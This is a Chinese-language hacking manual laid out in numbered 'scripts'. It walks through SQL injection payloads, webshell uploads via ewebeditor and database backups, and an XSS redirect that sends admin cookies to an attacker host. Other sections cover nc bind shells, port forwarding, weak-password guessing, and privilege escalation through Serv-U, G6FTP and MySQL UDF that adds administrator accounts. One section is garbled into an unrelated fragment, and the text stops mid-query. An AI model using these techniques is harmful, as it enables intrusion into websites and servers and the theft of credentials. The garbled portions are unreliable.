饭客脚本检测.doc

脚本一 找到注入点以后，先用明小子或者啊D扫后台，找到后台后再猜解用户名和MD5加密的密码，MD5解密可以到等网站去解密。 得到解密后的密码后，进后台，然后就是找有没有数据库备份，有数据库备份则上传图片格式的小马，然后数据库备份。如果没有数据库备份则抓包，得到上传路径和cookie，然后用明小子的综合上传动力上传漏洞图片上传，上传小马。 脚本二 ewebeditor编辑器漏 默认后台地址：/ewebeditor/admin_login.asp 默认密码：admin，admin；admin，admin888 默认样式设计路径：/ewebeditor/admin_style.asp 默认数据库路径：/db/ewebeditor.mdb 进入编辑器后,进入样式管理: 1.路径模式-绝对根路径 2.图片类型-asa 3.提交后点击设置此样式下的工具栏,点击新增工具栏-可选按钮中选择插入或修改图片-保存设置 4.点击返回样式管理-预览-上传图片-上传成功后选择(代码) 当数据库为只读,新增样式失败，然后利用http:/网址/ewebeditor/admin_uoloadfile.asp？id=14&dir=. (dir为列目录,.为返回上层目录),形式:dir ./. 进入网站目录后下载数据库 当MD5破解不了,可以试着去下载数据库,也可以在ewebsditor_style中擦汗看是否有前人留下的东西,然后记下id和s_name.例如id=48,s_name=asdasd,则构造成ewebeditor.asp?id=48&style=asdasd 然后在浏览器中输入:http:/网址/ewebeditor/ewebeditor.asp?id=48&style=asdasd,然后上传asa的小马. 脚本三 当用啊D和明小子发现注入点为DB权限时,可以用穿山甲看一下是否为sa权限,如果为sa权限时,则可以直接用穿山甲的CMD命令提权. 如果工具扫不到注入点,但用手动检测发现防注程序,则用注入中转. 在注入中转生成器中选择cookie注入,然在注入URL地址中输入注入点?id=前的网址,例如:/newshouse/show.asp 注入键名中输入例:id=,POST提交值:imdcw=中输入id值,例imdcw=40,然后将生成的网页放入搭建环境中. 接着DB权限列目录:在穿山甲的文件管理,然后逐步列举找网站目录找到网站目录后,在浏览器中输入目录中的一个页面来验证找到的是否为网站目录. 找到正确的网站目录后,用Getwebshell软件得到一句话木马.在Getwebshell的路径应为网站目录.例:D:freehostlsfffcomwebdb.asp.在地址中写注入地址,代码:中a为一句话木马密码.在Getwebshell中逐步完成后,用一句话木马客户端上传木马.脚本四 在注入中转后,放在本机建的网站环境中,然后用明小子,啊D或着穿山甲来猜表,得到用户名和密码，工具栏中输入 /. 防注入程序可能值过滤and ; ,不过滤or,xor,select,且可能不过滤大小写转换后的值. 脚本五 旁注:从旁注入,当工具扫不到注入点,或者进不了网站的后台,则可以用旁注.旁注可以用明小子,在旁注检测中输入域名,然后点,得到IP,然后再查询该IP上所有网站,查询到所有网站以后,点击SQL注入,然后批量扫描注入点-载入查询网址-批量分析注入点 如果工具查找不到后台,可以用谷歌和百度来搜索,各格式为site:网址 intitle:后台/管理 进入webshell后,测试网站是否支持aspx,因为aspx的权限更大,容易提权.如果aspx大马上传失败,可以用aspx的测试文件,替换其中的内容.脚本六 手工注入asp: 加,返回错误也面 and 1=1,返回正常页面 and 1=2,返回错误页面 and exists (select * from admin) 猜数据库中有无admin表段,返回正常页面则表明有admin这个表. order by 数字 猜字段数,数字不断增加,直到返回错误页面前的数字就是字段数. and 1=2 union select 1,2,3,4,5,.,n(n为字段数) from admin (admin为已有表段) 然后就是猜用户名和密码,例username,password.一般将username和password替换上一页面显示数字的地方. 例:and 1=2 union select 1,2,username,4,5,password,7,.,n from admin 当得到用户名和密码,进入后台后,如找不到数据库备份,使用上传时,提示图片小马上传成功时,要注意上传地址,如果写着是首页图片新闻图片地址,则到网站首页,选择一个首页图片单击属性,得到文件路径. 如果上传不成功,则抓包,如果抓包也失败,则在后台源代码找一下是否为ewebeditor编辑器,通过ewebeditor常见漏洞上传. 如果网址过滤 and 1=1 1=2 ,则用xor,xor 1=1 返回错误;xor 1=2 返回正常. 脚本七 手工注入PHP: 用order by 数字,猜字段数,如果数字到了1还报错,则直接猜字段.用and 1=2 union select 1,2,3,.,n,直到n返回正确页面. version() 查看版本,用法:替换数字. user() 查看权限,用法:替换数字. 如果显示root权限,则可以用loadfile()函数 然后则是猜表名,用到table_name和information_schma.tables 用法:and 1=2 union select 1,2,table_name,4,5,.,n from information_schema.tables 然后网页会列出所有表名,接着就是寻找敏感的表名. 猜列名和猜表名差不多,用到column_name和information.colums 用法:and 1=2 union select 1,2,colum_name,4,5,.,n from information_schema.columns 得到用户名和密码字段后,就构造语句查询其内容 用法:and 1=2 union select 1,2,用户名,密码,.,n from 表名 脚本八 一句话木马利用 如果后台的上传都不可用,但是用数据库备份,这个时候就可以用转换过的一句话木马. 到网站查找是否有留言的地方,在留言处全部填写转换过的一句话木马,提交后到网站后台备份一下,备份成asp文件,这样一句话木马就写上去了. 然后用一句话怒那客户端上传大马,注意一定要改一下上传后大马的文件名,不然可能文件名冲突某些不上大马.得到大马文件名的方法就是数据库备份一个新的asp文件. 脚本九 cain嗅探的方法 先一直下一步安装cain,安装完成后打开cain,点击Sniffer-Configure(配置)-选择要嗅探的IP,端口-应用-开始-右键空白处-空白处单击-灰色加号变蓝-单击加号-在左边显示IP处选择点击后右边空白处会出现要嗅探的那个IP-Start/Stop APR 接着Cain就会嗅探这个IP的一举一动,因此可以得到帐号和密码 脚本十 简单社工拿站 首先在目标网站上找到有用的信息,例如:电话,QQ,网址,邮箱 一般想得到密码,可以先选择找回密码,而找回密码一般都是通过邮箱找回,因此首要目标就是得到目标网站的提供的邮箱的帐号和密码. 邮箱常见帐号为域名,目标名称,或者QQ号,手机号,密码也是如此.如果无法猜解到密码,则通过找回密码,根据密保问题的回答来得到新密码.脚本十一 跨站的利用 在网站留言或者能输入信息的地方提交跨站代码,从而盗取管理员cookie,然后用cookie浏览器直接登录后台。 将以下代码保存为asp文件，例如fengshen.asp 这段代码的意思就是在法国fengshen.asp文件同目录下生成一个cookie.txt,该cookie.txt包含管理员的cookie信息。 要使上面的代码发挥功效，则要将fengshen.asp放在一个能下载的环境下，然后在留言的网站地址上写doucument.location=http:/下载地址/fengshen.asp?msg=document.cookie 当管理员通过审核留言后，则生成一个cookie.txt，所在地址为http:/下载地址/cookie.txt 脚本十二 site：网站 filetype:asp/aspx/php/jsp 查看脚本类型 如果网站没有任何已知漏洞，且旁注也失败，那则用工具查看是否有FTP，从FTP简单才接入侵。常用密码可能为 域名 123456 111111 666666 888888 域名123 域名888 脚本十三 绕过后台验证进后台： 有时候进后台网页的时候，会提示先登陆，现在有多重方法绕过验证 一.提高IE安全等级，将IE等级调到最高，可以将全部弹窗禁止，从而直接进入后台 二.在弹出登陆提示页面，查看源代码，将弹出弹框的语句删除，并注意在代码中加上网站网址，不然不会跳转。 三.直接用拦截弹框的浏览器查看 NC拿shell 1.将小马的抓包信息复制到文本文件中。 2.在抓包信息中name=filepath下的路径填写小马名称，例./UploadFiles/1.asp (在1.asp后面有空格) 3.在Content-Length处加上uploadFile/后增加的字节数 4.用C32将空格的20改为00，保存为1.txt 5.然后用批处理文件上传，批处理命令： nc 网址 80n;2m-n+2(n-m)+2n,但是这两句语句却是合法的。因为a.id和b.id在*；i是有的，那么计算机在会自动去掉重复的，保持集合的唯一性，这样一来虽然查询结果相同，但是*里的字段排序顺序却被打乱，因此很可能让username,password偏移到可显示的位置。 如果上面的方法还不行，则 union select 1,2,3,.,3m-2n,a.id,b.id,c.id,* from (admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) 还不行，则继续偏移 union select 1,2,3,.,4m-3n,a.id,b.id,c.id,* from (admin as a inner join admin as b on a.id=b.id) inner join admin as d on a.id=d.id) 脚本十六 lcx端口转发拿内网服务器 1.上传lcx.exe到目标服务器 2.本地主机启动lcx.exe监听，命令： lcx.exe -listen 1234 5678 /监听1234端口，并转发到5678端口 在目标主机运行： lcx.exe -slave 你的IP 你监听的端口 目标主机IP 需要转发的目标主机端口 例：lcx.exe -slave IP 1234 IP 3389 3.本地远程桌面连接 :5678 脚本十七 NC反弹cmdshell提权 -l 监听本地入栈 -p port 打开本地端口 -t 以telnet形式应答入栈请求 -e 程序重定向 命令：c:recyclernc.exe -l -p 8080 -t -e c:recyclercmd.exe (8080不行，可以试一下其他随意端口) 本机：telnet 肉机IP 端口 脚本十八 access数据库导出shell 前提是表段和网站目录已知，且后台可以执行SQL语句 执行语句为： SELECT into表名 in 网站路径+导出的名字（例:1.asa;1.xls)excel 8.0;from 表名 当网站禁止写入asp时，2.asa;2.jpg 或者替换掉小马 脚本十九 Serv-U提权只目录修改权限 前提是一定有修改文件内容的权限 首先在C:Program Files 中找到Serv-U，然后找到配置文件ServUDaemon.ini，复制下一个用户名的信息，信息格式如下： USER=incbo|1 USER=incbo|1 Password=jwfbbd244c8. Password= HomeDir=e:网站 HomeDir=e:网站 Passwordlastchange=1275296180 - Passwordlastchange=1275296180 TimeOut=600 TimeOut=600 Note1=Wizard generated account Note1=Wizard generated account Maintenance=System Access1=E:网站|RL Access1=c:|RWAMELCDP 其中RL处为该账户权限，所以最大权限是RWAMELCDP，Maintenance=System的意思是该账号为系统管理员，接着在版本信息后加入ReloadSettings=True，此时Serv-U会自动刷新配置文件并生效，此项随之消失，再有修改则再次添加。然后在User = incbo|1|0后加入User = fengshen|2|0 保存配置文件后，用CMD直接连接FTP FTP提权命令：Quote site exec net user fengshen 12345 /add Quote site exec localgroup administrators fengshen /add 200 EXEC command successful (TID=33) /执行成功 脚本二十 Serv-U提权之端口转发 上传FPipe.exe后执行CMD命令 C：RECYCLERFPipe.exe -v -l 44959 -r 43958 然后用本地搭建的Serv-U，新建服务器，IP填目标主机IP，端口写转发端口，用户名：LocalAdministrator,密码：#l$ak#.lk;0P，完成后选择连接。 脚本二十一 SQL数据库寻找sa密码提权 先在webshelll中查看conn.asp,web.config,然后寻找数据库连接的用户名和密码。通过webshell上的数据库连接来提权。最好是用aspx的大马跨目录寻找同一服务器上所有网站的数据库的连接信息，这样成功率更高一点。 脚本二十二 Mysql提权 寻找ROOT的密码，数据库名等，一般在inc.php,mysql_config.php中寻找，找到后上传udf.php，接着导出安装udf.dll 接着执行命令：Create Funcation MyCmd returns string soname udf.dll; 然后是提权命令：Select MyCmd (net user fengsheng 123456 /add) Select MyCmd (net user localgroup administrators fengsheng /add) 脚本二十三 G6ftp提权 在Gene6 FTP Server -RemoteAdmin-Remote.ini中server得到用户名和MD5 32位加密的密码。 由于G6FTP的8021端口是不外联的，所以要用FPipe来转发，命令： C:RECYCLERFPipe.exe -l 51 -r 8021 然后本地G6FTP-新建服务器-主机（目标主机IP）-用户名-密码（解密后的密码）-端口（转发的端口，例：51） G6FTP的命令需要自己提交批处理文件，批处理命令： echo off net user fengshen 123456 /add net localgroup adminstrators fengshen /add 保存为bat文件后，用webshell上传，再到G6FTP-SITE命令-添加-命令名称（可以随意名称，例如fengshen）-执行处（找到bat文件的位置） 接着用cmd连接FTP，然后 执行 quote site fengshen 脚本二十四 PHP入侵的基本流程 先找到注入点，然后用order by n 猜解字段数，然后 and 1=2 union select 1,2,3,.,n,在显示数字的地方用database(),version(),user()替换，查看数据库名，版本和权限，接着就是load_file（）函数读取文件内容 在网址/info中查看网站路径 如从中找到配置文件：/private/etc/php.ini，然后将/private/etc/php.ini用软件转换成16进制（Hex），放在load_file()中，例：load_file(OX2F7072.)然后替换能显示数字的地方。独处配置文件，Ctrl-F查找magic.quotes_gpc，如果为off，则可以插入一句话密码。 再在info中找一下网站路径：例如：/WebServer/Documents/info.php 接着随便读取一个网页，例：Viewnotify.php，方法为： 补全Viewnotify.php的网站路劲，注意应与info同目录，例：/WebServer/Documents/lecture/Viewnotify.php 然后将补全的路径转化为十六进制，再用load_file()读取，然后查看源代码，查找其中的包含文件，例： include_once (dirname(_FILE_)./inc/conn.php); include_once (dirname(_FILE_)./inc/function.php) 然后查看/lecture/inc/conn/php存不存在，只要不是404错误就是存在 接着再补全/inc/conn.php,转换成十六进制，再用load_file()读取数据库连接文件，例如： include_once (dirname(_FILE_)./mysql_class.php); include_once (dirname(_FILE_)./config.php); 接着查看/mysql_class.php是否存在，mysql_class.php应与conn.php同级别目录，然后补全mysql_class.php目录，转换成十六进制，再用load_file(),接着查看源代码，用Ctrl-F，查看是否有root，如果没有则看下一个config.php。 用Ctrl-F查找root，得到： $web_datahost=localhost; $web_database=pku_mydata; $web_datauser=root; $web_datapassword=podcast-loxp; $web_dbtop=pku_; $web_name=pku; 然后用数据库软件连接，CMD进入mysql，用法： mysql -h 目标主机IP -u用户名 -p密码 如果数据库不准外连，那就只能猜表了 and 1=2 union select 1,2,3,TABLE_NAME，5，.，n from information_schema.TABLES where TABLE_SCHEMA=库名 limit 0,1 （库名为十六进制） 然后就会得到表名，不断增加limit 0,1 后0的数字，会得到一个一个的表名，直到得到admin一样敏感的表，接着就是将敏感的表名转化成16进制，用法为： and 1=2 union select 1,2,3,COLUMN_NA